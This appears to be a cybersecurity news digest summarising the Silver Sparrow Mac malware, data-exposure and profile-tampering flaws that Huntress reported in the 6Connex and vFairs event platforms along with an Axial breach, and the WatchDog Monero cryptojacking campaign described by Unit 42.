At a glance.
- Silver Sparrow targets Macs.
- Vulnerabilities in virtual event platforms.
- WatchDog cryptomining operation stays under the radar.
Silver Sparrow targets Macs.
Researchers at Red Canary, with help from Malwarebytes and VMware Carbon Black, uncovered a malware downloader dubbed "Silver Sparrow" that's designed to run on Apple's new M1 chips. According to Malwarebytes, the malware has been detected on just under 40,000 Macs, although its purpose is unclear since it currently lacks a payload. The researchers also aren't sure how the malware is delivered. Red Canary's researchers say they "suspect that malicious search engine results direct victims to download the PKGs based on network connections from a victim’s browser shortly before download. In this case we can’t be certain because we don’t have the visibility to determine exactly what caused the download."
Red Canary concludes, "[T]he ultimate goal of this malware is a mystery. We have no way of knowing with certainty what payload would be distributed by the malware, if a payload has already been delivered and removed, or if the adversary has a future timeline for distribution....Finally, the purpose of the Mach-O binary included inside the PKG files is also a mystery. Based on the data from script execution, the binary would only run if a victim intentionally sought it out and launched it. The messages we observed of 'Hello, World!' or 'You did it!' could indicate the threat is under development in a proof-of-concept stage or that the adversary just needed an application bundle to make the package look legitimate."
AppleInsider reports that Apple has revoked the developer certificates used by Silver Sparrow's author, which will prevent new infections.
Vulnerabilities in virtual event platforms.
Huntress has uncovered vulnerabilities in the virtual event platforms 6Connex and vFairs. The first flaw, which affected 6Connex, was a supply chain vulnerability through webcast.com. During 6Connex meetings, the platform would reach out to a Webcast.com URL that contained a meeting ID. If a user visited this URL, they would see a JSON file that contained every participant's country, state, IP address, first and last names, address, phone number, password, company, and email address. The researchers found that if they changed the meeting ID in the URL, they could gain this information on participants in any other 6Connex meeting. Huntress notified Webcast in October 2020, and the company fixed the flaw within a week.
The second set of flaws affected vFairs, and allowed logged-in users to view other users' private information, including email addresses. Additionally, a user could update any other users' profile without permission. This bug could allow a user to launch a cross-site scripting attack against any chat room via users' profile descriptions. The researchers also found that users could exploit this flaw to upload a PHP file that would run on vFairs' servers. The researchers didn't go any further than this, since the severity of the vulnerability was clear enough.
Huntress reported this flaw in September 2020. VFairs was slower to respond than 6Connex, but eventually acknowledged Huntress's notification. It's still not clear if the flaw has been patched, however.
Huntress also took the opportunity to report a data breach that affected Axial, the largest M&A transaction platform for small- to medium-sized businesses. The breach, which hadn’t previously been disclosed or reported, exposed “250k+ confidential details on SMB mergers and acquisitions, financing, and more.” The data were briefly posted to Twitter before the social media platform deleted the posts and banned the user. The Twitter user who posted the data said Axial had “fully exposed their Jenkins server to the web, with no authentication and full access rights granted to anonymous users.”
For more, see the CyberWire's "Zero days in online meeting platforms."
WatchDog cryptomining operation stays under the radar.
Palo Alto Networks' Unit 42 outlines a major, long-running Monero cryptojacking campaign dubbed "WatchDog." The campaign has been active since at least January 2019, and the researchers "conservatively estimate that an average of 476 systems are actively involved within the WatchDog mining operation at any one time." The operation has generated at least 209 Monero coins, totaling approximately $32,000. The malware is distributed by scanning for and exploiting known vulnerabilities:
"The authors of the script tipped their hand to show how they set up and configure their mining infrastructure. Within every known operation, the initialization bash script is downloaded onto the compromised system and performs a series of functions. Several of the functions are common to a majority of cryptojacking operations, namely the removal of cloud security tools, the removal of previously installed and known malicious cryptomining software, and then the downloading and setup of the customized malicious cryptomining software. However, the WatchDog bash script miner also hardcodes a primary and secondary URL address that are used to download the WatchDog mining toolkit."